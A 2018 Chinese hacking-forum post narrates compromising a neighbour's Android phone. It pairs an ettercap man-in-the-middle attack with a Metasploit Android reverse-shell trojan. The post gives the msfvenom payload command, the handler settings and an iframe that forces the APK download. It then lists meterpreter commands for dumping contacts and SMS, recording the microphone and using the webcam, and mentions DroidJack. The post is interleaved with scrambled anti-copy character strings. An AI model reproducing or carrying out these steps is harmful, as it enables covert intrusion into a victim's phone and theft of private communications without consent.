找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1828|回复: 0
打印 上一主题 下一主题

metasploit+ettercap中间人攻击成功入侵邻居手机

[复制链接]
跳转到指定楼层
楼主
发表于 2018-10-20 20:30:37 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

2 H% P2 b$ ~5 k 五、msf+ettercap入侵邻居安卓手机 9 ^ e( e# k# v3 Y

: a3 G* y U" C1 R& }- q8 _

w, ]1 W3 a9 ^ 首先启动msf $ v1 k' h# P* u

# G* b( l9 ]6 F$ v& i

$ [- r* }* y4 d e* h8 o 先用kali生成一个安卓木马,如下命令: & Y& ?4 a3 t; Z) f r! h' @" g

" s* L5 N2 R/ @, R4 A9 F- d

! _' C, g7 @# t8 c- p% g N8 d2 ~ Msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.109 LPORT=44444 -o ~/Desktop/ribenav.apk : {, x/ o. M( R' `

- A% H8 Y5 l9 V' W

1 F; N& L+ G! ^% K 为了能让对方下载以后安装我这里将马的名字命名为ribenav.apk,哈哈邻居可是个“大色鬼”,就不适用替换下载的方法了,据我所知,邻居频繁使用手机浏览器浏览新闻 & N0 L8 ?3 A: p6 ^9 r

9 w9 e4 v) ]3 f y$ `2 r

% u3 U8 V# a# v6 B6 P6 ` 然后进入msf 0 B8 D* q# E( r' }: h J

" O$ z2 D J2 W8 ]

; X5 i0 e1 S' x7 |2 j3 y+ S3 Y { use exploit/multi/handler ) }$ J/ \+ Z" O+ k

~% {9 p% z( i# E

9 \) W' W4 T5 t set payload android/meterpreter/reverse_tcp 4 U5 ~; c. K# }9 F

y7 \0 p8 u6 m/ L# I# G5 [

5 x- ?% s% c3 t- _ set LHOST 192.168.0.109 //ipkailiip / J( E* ? W; G+ D9 v3 P

1 A- G; x, x9 e0 m

J- p8 s z4 G3 u set LPORT 44444 //端口一定要与前面生成的木马的端口一致 1 C7 o- Y' p( V0 H) \ S

; X1 P& K7 `# [4 Z+ T( \# ?

! f; o7 p3 m% R- c% ^2 m Exploit 6 x2 R7 E+ T% a0 D

G8 _% i4 g! y

) a4 c6 `7 G! \1 n, s& g. J8 q   2 U8 R8 t% x7 Q0 \

) b7 [5 S' v, z s* U1 V; F

$ v. H& G; O# ?: r6 q 下面我们开启ettercap -G 2 |% D& k+ v7 @

9 K/ S, e B E

1 c; k( m0 E8 w 我物理IP , k# |# ~/ R( U) F

; Y7 ` d, a' |4 h& {; v

# w& ~' Y- p% V! ]& ^5 |5 ]% L   . `2 f! d) _3 A% b8 c

4 n- p' p# J0 A7 Z) z6 ^

9 i$ M8 _1 D5 O 别到时候再把我物理机欺骗了,之前测试物理机只装腾讯管家是可以成功欺骗的, 4 P l+ d1 \. T9 w, K

" M: O+ o7 j: c) d

* s2 B& H% M; X# I 下面我们来设置一下 3 S3 u7 n5 z9 M6 w3 J

& h6 q' I$ M: T. i2 {; w- l

! u3 d$ j: M) I; q9 a   ) Q& X" G8 W+ M' W

/ C0 q/ a) a" b% J1 f6 q8 s

2 S3 u9 U7 w% y, r+ K6 y 在开启欺骗之前我们先把生成的apk马丢到kaili var/www/html下,并创建一个index.htm文件内容为:<iframe src=http://192.168.0.109/ribenav.apk></iframe>,因为apk文件嘛要想直接提示下载,用iframe语句就OK了, ! W3 L' P3 K8 \1 y) h! j

$ ? S4 V# C) p! {

% v& m: y' x( T! q# t. b0 S   # E- b6 D9 d% V" q! j0 d0 U% Z

5 q& X! b: C) _: T. w% |! I

( s) W; y+ @" ]- `   8 x( v# o& R6 z0 k) B

2 B% P. `% k4 r" T5 W6 C( N& J

6 e% B E' L) b }9 c9 [7 p8 C   # Q4 `* I, g& _# f- J' H

5 g6 g2 ^) `4 J/ Z

: X1 J6 }' H2 G8 B6 Y/ u# L/ ]   & i: K$ y7 ~$ D4 `7 `6 D

) \( |$ | D7 j) l# p

. _) }# h B$ Q8 K- O9 B- ~   7 Z% Y: f( w( t2 Q

9 J0 @6 j% D Z" _6 e

* f$ i7 `, ]# H1 x$ m: i' G   $ Y ]0 R! L( N4 ^9 A6 I% a

, _. ?! `* n' x4 u7 A8 J0 l

" ]5 u6 v! a3 W) ^& t I8 j   " V( Q, t% J& L% b+ N) \

- |* T/ i: Z) [3 p

1 T8 c- I0 Y0 U   & v, e- S% {8 ?& ]4 h

. A# }6 S/ H% ~

, [6 }4 n; M3 S   ) a* r, t% A+ m& J+ {

- _* S4 q/ Y) X: p* L, g* s, X; g

4 i! z$ U# R3 n   ; J# r4 S. K' C9 D$ j- ~$ L; f

5 l3 ] L9 C5 h8 t$ z

5 s& [1 S8 d! z6 F9 }# p   2 [6 J t, T+ `) {0 r

* K* ^( l- [. D- k' `. q! l

7 z2 I6 `" d W( e8 }   - D% g" D% A# D v+ f7 b$ C

0 `! ^: P" G2 p6 d* R

' U' e( P- Y) T3 o1 J0 p$ ^   5 m# ]4 J4 w( }

& P* _3 q. c9 L9 r7 K

9 I# f/ K1 x0 i* R v7 d8 H1 P 下面我们开始攻击 ( X% u6 |% f4 ]4 ~, K, \" ?

9 P7 J0 T4 s- V5 Z$ w

# N) A" ^3 x+ g5 J, `2 `- v   ' }) E& | j/ @ s0 i' `/ s

$ R2 H% O4 w9 [3 s3 \! O) R7 P! `

# u. N x7 q' `: H' @7 M   5 E' c" \9 n, z

1 w; d2 W7 r7 F' D% n# p8 f/ P2 _7 s J

9 ~" ?! t& J9 S   / X# n, n" W- M7 M5 k* R8 @: S

6 l* E0 X9 r5 b! }' i8 e

) X3 A3 z4 }4 S+ I# E/ b( _1 B   7 V7 ~0 U" p: Y+ ]* h2 R$ q

& Q6 [. {( a7 g# B& ^$ T$ n5 z

& H! h$ |, x% H% U( Y; m" j" b; N9 f   6 L9 K- f: i! _) r) {4 t

, Y9 l2 z8 ?/ A

1 ~$ R1 |+ g5 W& [! N 大概过了5分钟多,发现反弹成功了 5 I/ C8 _0 j+ J9 u* c

' ?/ B; B- w* G* R/ V8 g

+ v9 U& d' \# K) M& j3 @( {) r   & v/ T' `* Y z

% i: U+ w* f1 @* W3 J1 C! H

9 e z' w8 G0 P; i   f7 |* ~' n* V' k

7 @- J8 J$ W; m+ ^8 ]

/ `0 ?& u) y! D$ J& y0 ^- J& O   % Q$ b8 y; Z& g4 g7 A" D" v& m

) V% ]9 i6 m5 y$ e+ l' O# h, S

; o1 x+ t: h( Y8 }2 E* V0 Y% W   1 O- i; T/ E# V

: G+ B3 `! ~$ N3 R: L0 a& \ T% Q: B

; J, k% u& n/ I' b% @% `: G) Q- P   : |3 t. ~ x2 d/ m! C; \8 |

. p$ b+ ]) f# h( j/ D+ r

. y7 l+ t' ~1 R+ }% f   " e' g% X# \; j9 U7 n

# l4 G, @; _5 X: r! \( G$ P; r8 }

9 e+ c; f' q* q6 e9 U5 W4 n1 W' ~   & _ A! v5 b! q' ~" }! O

; k1 K7 o f/ g- }3 X& ]7 l8 ?

7 H8 y5 e' D* E V5 E; | 执行命令 , C% ^$ V# w0 g5 A5 t

2 J. v4 C' |& t! W1 Q7 j' h+ Y" B

: s3 p5 U! u" v2 A   ' b2 I0 q4 p, d

5 P. k/ L+ T' f8 W9 I# S8 p7 v, ~ t

" X* n0 }4 V9 L. p+ g# k dump_contacts    --》这个是导出电话 ( s d. D! S# J4 W u) E

' M' N) k9 q& h% l$ G

% @* i0 N1 Q' @2 R dump_sms --》这个是导出信息 7 Q. O' m3 ?" K* p) D( M- D

v& X" d3 ]' T. F

; a/ j. f# B) @8 K9 a) L3 y) b record_mic     Record audio from the default microphone for X seconds 6 r2 K+ w! _* g/ ]0 Y) V

- j" x1 o7 S. S/ _

& q3 _7 S. ^1 Y. x     webcam_chat    Start a video chat . L6 R6 y& b& k9 ?

/ t- }2 ?1 `" [% |2 B* S, O

) W* B' c) |4 ?. U+ W     webcam_list    List webcams ( Q+ d0 \4 C. J! j* @9 y- J

/ H: b& a8 S' J

3 g( J% K; q+ _' R     webcam_snap    Take a snapshot from the specified webcam - g* l0 F) `5 X* F' m9 A" d

' B9 e( l. E; F: N' X) b4 C. u& _

; K4 t: K. F) J+ H- ]# k4 z- y, N webcam_stream  lay a video stream from the specified webcam # J0 [1 w- m: j+ y7 q

% p) [$ A7 r% U* K8 B

" d* h7 A$ F7 ]& M+ q   # f* y: {0 j& W

! i$ O* P6 D; i3 J6 C' H% ` U, [1 W+ `

4 E& {! z( F, |: \   ) B% a. n* Q4 P: B: y1 T

: Q% N4 X) _5 z3 x1 y9 j, Q

* y' [/ x; l8 L! W { 我们打开看一下电话薄, / v, r5 w$ i5 K" U. e, @7 D

- I1 |. N' i$ h8 \9 i- v- d

% v) |) [: N6 L1 q- ?   9 z$ n6 R* L" t. z5 t. n

6 h& F; P& N$ l) L) n! W4 d5 ~

6 z8 l1 d8 S u   % V2 R7 j" P, ?$ A

: U9 X: o* l* w. U5 C

. `9 ]! T$ F, s* Q   3 u; k2 @# b! f" W$ R

) S3 @& j. }. f7 j3 i6 L

% f# M# {, S5 Z6 ?* G! \# ?   6 d0 m3 o; x1 y9 x

5 }' f$ s( J( U @3 t; l, j$ a

7 \6 ^6 b' f# n; n   , ?7 s( m& N8 {$ W& ?1 J7 ]

. Z! n7 }/ `8 E: _/ I

8 E& N* W) P/ r' h   & g. ^# ~% r' t

8 H" e8 U0 j$ U- v& N( C

/ g7 x% y8 x7 w. j 我们同时欺骗成DroidJack木马,使用方法如图: 7 R7 ^1 U1 e* O7 B7 x$ g

' V; @, ?# L6 D/ H

/ {' a5 E) P6 P5 Y9 M9 F5 H   . i4 ~+ E6 K$ o) m+ |" A

: Y0 b6 @( {& \

: k9 F$ J' ]* }) H. {# j5 Y3 u   / @6 c0 a) y' Z& w+ {" L

; N& R: S2 o( E+ n" m2 O$ Q2 b

l8 D6 r) ? H* A   ( S3 i0 G: p6 V3 o

& ?5 `9 w" d4 Y$ _

4 p N, r/ @/ z; D$ o1 H) b& t 切记在前面生成完马以后记得在这里选择开关为on,并且对应前面生成马的时候的端口 + _% ]8 k+ z" C3 y0 o" Q' N

: B5 z3 }9 ~+ y7 t! v. O8 V

2 E; J" h8 q; j7 J: r   ! f; T& J8 X* p; b0 N7 s

0 W. R; V' @0 `5 n

! h# }8 ?( E& A; U, s X   7 |! {0 d2 W* G" p1 D4 f1 X3 y9 J

0 J/ X: u$ s) x! g {; H; I

8 Z! ~% ]( M1 S! B$ v% m5 P% l% y   " X8 r6 H% u* P& @, u

, j1 T* e3 E2 X" f# a

+ a- a Q5 \% Y6 S1 @2 A u- [- C + ]* m8 ?8 ^$ i; e

1 z4 N4 ]/ f `) j5 b

! z7 z: c, ^; k5 d, E+ d: T* D8 H9 }
' f& M4 r6 |) A0 t0 S, W

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表